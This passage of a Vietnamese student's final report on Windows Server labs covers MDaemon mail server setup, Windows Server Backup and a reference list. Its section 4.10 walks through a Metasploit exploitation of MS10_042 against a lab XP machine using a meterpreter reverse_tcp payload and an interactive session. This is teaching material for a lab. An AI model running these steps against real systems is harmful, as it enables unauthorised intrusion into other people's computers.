chọn I already have a registrtion key(enter it here)
Điền thông tin ở phần Registration Information

Gõ tên Domain: Athena.edu.vn

Điền thông tin
Điền thông tin địa chỉ IP

Trên máy Sever vào Start Mdaemon
Tiếp tục để mặc định rồi Next -> Finish

Xuất hiện hộp thoại,vào Accounts chọn Accounts settings

Bỏ click chuột vào phần Require strong passwords
Tiếp vào Account chọn New Account,điền tên và pass địa chỉ mail tk1->ok

Ta làm tương tự cho tk2,
Sau đó,về lại máy Xp để thực hiện việc gởi và nhận mail

Tiếp tục mặc định chọn Next

Trước khi gởi mail ta sẽ phải nhập name Display
Sau đó điền địa chỉ Email

Gõ địa chỉ IP của Mail sever
Nhập Pass

Chọn Create Mail để sọa thư gởi
Ta sẽ nhận được mail bên máy Xp2,với nội dung là xin chao bạn
Tiếp tục tương tự ta sẽ thực hiện gởi mail từ máy Xp2 sang Xp1 với nội dung
thư “da nhan duoc”

Tiếp tục kiểm tra thư bên máy Xp1
Như vậy đã hoàn thành quá trình gởi và nhận mail trên 2 máy Xp1 và XP2

4.10 Khai thác mã lỗi MS10_042
Đăng nhập bằng lệnh msfconsole
Khai thác mã lỗi MS10_042 bằng lệnh search ms10_042

Sử dụng lệnh use copy mã lỗi
Tiếp theo ta sẽ gõ lệnh show options để coi các thuộc tính thông tin của mã
lỗi

Gõ Set srvhost -> Địa chỉ máy xp 192.168.232.129
Tiếp theo gõ set payload windowns/meterpreter/reverse_tcp

Set lhost -> Địa chỉ IP máy back track:192.168.232.129
Gõ lệnh exploit,để xuất hiện mã lỗi,sau đó coppy mã lỗi qua máy XP để khai
thác mã lỗi

Chúng ta sẽ cho nạn nhân truy cập vào mã lỗi vừa tạo
Chúng ta sẽ thấy địa chỉ máy XP đang truy cập là 192.168.232.128

Gõ tiếp dòng lệnh Sessions,chúng ta sẽ thấy có một máy đang bị tấn công là
máy XP có địa chỉ 192.168.232.128 thông qua bọt 1067
Tiếp tục dòng lệnh Sessions –i 1

Gõ getuid để coi tên máy nạn nhân
Như vậy việc khai thác mã lỗi đã thành công

4.11 Mail Server trên VPS
Mô hình:
Mục tiêu:
- Cài đặt dịch vụ Mail Server (sử dụng phần mềm Mdeamon_Mail) trên
máy chủ ảo (VPS)
- Thực hiện kiểm tra gửi mail tới các tài khoản Gmail, Yahoo mail… và
ngược lại
Lưu ý: Nếu thực hiện bài trên môi trường máy ảo VM-Ware
- Các card mạng để ở chế độ Host – Only
- Nên tắt tường lửa trên Server và PC
Thực hiện:
- Bước 1: Cài đặt phần mềm Mdeamon_Mail
- Bước 2: Cấu hình Mdeamon_Mail
- Bước 3: Tạo tài khoản trên Mdeamon_Mail
Bước 1: Cài đặt phần mềm Mdeamon_Mail
Đăng nhập máy chủ ảo VPS bằng công cụ Remote Desktop.
Dowload bộ cài đặt Mdeamon và chạy file Setup.exe

Trước tiên, bạn tải phiên bản MDaemon Mail Server mới nhất và bắt đầu quá
trình cài đặt.Bấm "Next" để tiếp tục.
Đánh dấu vào ô "I have read and I agree with all the terms of this license
agreement"

Chọn đường dẫn lưu trữ của chương trình, mặc định sẽ là ổ C hệ thống (ổ đĩa
có cài hệ điều hành Microsoft Windows).
Lựa chọn phiên bản cài đặt, nếu bạn có key đăng ký thì nhập vào ô phía dưới.
Ở ví dụ sử dụng là phiên bản free hoặc miễn phí 30 ngày của phiên bản Pro.

Điền các thông tin phù hợp với vị trí, ở đây là VietNam
Sau khi hoàn tất các bước trên, chọn "Next" để bắt đầu cài đặt.

Chờ đợi cho quá trình cài đặt hoàn tất.
Điền tên Domain chính xác ví dụ: phamthidiemkieu.vn

Điền địa chỉ DNS chính (Primary) và dự phòng (Backup)

Giữ nguyên lựa chọn "Setup MDaemon as a system service"
Bấm "Finish" để kết thúc quá trình cài đặt và cấu hình ban đầu, bắt đầu sử dụng

Giao diện sau khi cài đặt thành công.

Tạo 1 tài khoảng mới vào Account  New Account…
Nhập thông tin vào Email address và Email Password. Click OK để tạo tài
khoảng Email.

Qua Win XP1 tạo Client 1……Ta vào Outlook Express.

Cấu hình Out Look mail để quán lý mail cho tài khoảng
tk1@phamthidiemkieu.vn. Nhập tên hiện thị vào Display name và click Next>
Nhập địa chỉ Email và Click Next>

Nhập địa chỉ IP vào 2 ô Incoming và Outgoing và click Next.
Nhập tên tài khoảng và mật khẩu. Click Next

Click Finish để hoàn tất cấu hình quản lý mail cho tài khoảng test.
Qua Win XP 2 tạo Client 2.

Nhập địa chỉ E-mail
Trong cửa sổ Internet Connection Wizard điền thông tin
Trong cửa sổ Internet Connection Wizard điền thông tin

Nhập Mail và Pass để đăng nhập
Qua máy Xp1 đê gởi Mail cho Xp2
Qua Xp2 kiểm tra Mail,ta thấy nội dung mail như đã gởi

Tiếp tục việc gởi Mail ngược lại từ Xp2 cho Xp1
Kiểm tra Mail bên máy Xp1

Tiếp tục trên máy Xp1 gởi mail đến địa chỉ mail thật
4.12 WINDOWS SERVER BACKUP
I. Mục đích
Windows server backup là một tính năng mới trên hệ điều hành Windows
Server 2008 cung cấp chức năng lưu trữ (Backup), phục hồi dữ liệu (restore)
và phục hồi hệ thống (Operating System Windows Recovery). Sẽ giúp cho
người quản trị phục hồi nhanh chóng nếu hệ thống bị sự cố.
II. Các nội dung chính
- Cài đặt Windows Server Backup.
- Backup Server.
- Restore File và Folder.

III. Các bước thực hiện
1. Cài đặt Windows Server Backup
Mở Administrator Tools  Server Manager, click chuột phải Feature 
Add Feature.
Cửa sổ Select Feature, bung Windows Server Backup Feature  chọn
Windows Server Backup  Next.

Cửa sổ Comfirm Installation Selections, chọn Install. Sau khi cài đặt hoàn
tất. Thì đóng cửa sổ lại.
2. Backup Full Server

Mở Administrative Tools  Windows Server Backup, vào Action 
chọn Backup Once… Cửa sổ Backup options, kiểm tra chọn Different
options, chọn Next.
Cửa sổ Select backup configuration, chọn Full Server, chọn Next.
Cửa sổ Select backup destination, trong ô Backup destination chọn ổ cứng
để lưu trữ file backup  Next.

Trong hộp thoại Windows Server Backup  Yes  cửa sổ specify
advance option, chọn VSS copy backup  Next  Backup.
Quá trình Backup đang diễn ra.
Cửa sổ Backup progress, kiểm tra backup thành công  Close.

Mở Windows Explore, vào ổ cứng lưu file backup kiểm tra các folder
WindowsImageBackup ( folder lưu trữ các file backup).
3. Restore File và Folder
Mở Windows Explore, vào ổ C xóa một vài thư mục ( giả sử server bị mất
dữ liệu).
Mở Windows Server Backup trong Administrative Tools, vào Action 
Recover…  cửa sổ Getting started, chọn This Server  Next.

Cửa sổ Select backup date, chọn đúng ngày lưu trữ file backup  Next 
cửa sổ Select item to recover, bung ổ đĩa chứa folder cần Restore  Next 
cửa sổ Specify recovery options, giữ cấu hình mặc định  Next  cửa sổ
Confirmation, chọn Recover  cửa sổ Recovery progress, kiểm tra folder
restore thành công  Close.
Mở Windows Explorer, vào kiểm tra Restore được foder.
Vậy là đã hoàn thành Windows Server Backup trên Windows Server
2008.

Kết Luận
Những vấn đề đạt được:
 Cài đặt và cấu máy chủ Windows Server 2008
 Cài đặt máy chủ quản trị miền Domain Controller
 Cấu hình máy chủ DHCP và DNS
 Cài đặt và cấu hình Mail Server trên Local và trên VPS
 Cài đặt và cấu hình Web Server trên Local
 Cài đặt và triển khai VPN Client to Site trên Local
 Sử dụng công cụ quản trị Server Manager trên Windows Server 2008
 Tài khoản người dùng, tài khoản máy tính, nhóm và đơn vị tổ chức
 Quản trị môi trường làm việc người dùng, máy tính sử dụng chính
sách nhóm
 Quản lý và cấp phép quyền truy cập tài nguyên
 Backup dữ liệu trên Windows Server 2008
 Khai thác mã lỗi của System Hacking
Hướng phát triển của đề tài:
 Nghiên cứu và triển khai mô hình VPN Site to Site trên Local
 Mở rộng và đưa ra kế hoạch bảo mật mạng và máy chủ
 Đảm bảo tính khả dụng và khai phục hệ thống sau thảm họa
 Cài đặt và cấu hình VPN Site to Site trên VPS
 Cài đặt và cấu hình Web Server trên VPS

Phụ lục
Tài liệu tham khảo:
 Tài liệu MCSA quản trị mạng trên Windows Server 2008 (Trung tâm
Athena)
Một số Website:
 http://www.athena.com.vn/
 http://www.nhatnghe.com/
 http://www.google.com/
 http://www.youtube.com/
Và một số tài liệu khác trên internet
Link báo cáo:
Slide Báo Cáo Cuối Kỳ
http://www.slideshare.net/LyND1473/bo-co-cui-k-34350320
Windows Server Backup
https://www.youtube.com/watch?v=lz1xpoLRqsY
DHCP
https://www.youtube.com/watch?v=AnmZGJR88TM&feature=youtu.be
DNS local
https://www.youtube.com/watch?v=yN5a8L-zhXM&feature=youtu.be
Local Policy
https://www.youtube.com/watch?v=1007li4xG9k&feature=youtu.be
Local Security Policy
https://www.youtube.com/watch?v=LjuHSWdMA7Y&feature=youtu.be
Local User & Group
https://www.youtube.com/watch?v=BBmdJ_Uhlo8&feature=youtu.be
Ms12_004
https://www.youtube.com/watch?v=sN3LIqJYkHo
MS10_042
https://www.youtube.com/watch?v=B6rC9I-zhE0
mail server tren local
https://www.youtube.com/watch?v=_i-lFItoA-E
mail server tren pvs
https://www.youtube.com/watch?v=DfRvAKh2ZXc
Domain
https://www.youtube.com/watch?v=WMj_UthOVe0
VPN (Client To Site)
https://www.youtube.com/watch?v=TI1YwdHXBk4&feature=autoshare

Báo cáo cuối kỳ

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (20)

Similar to Báo cáo cuối kỳ

Similar to Báo cáo cuối kỳ (20)

Báo cáo cuối kỳ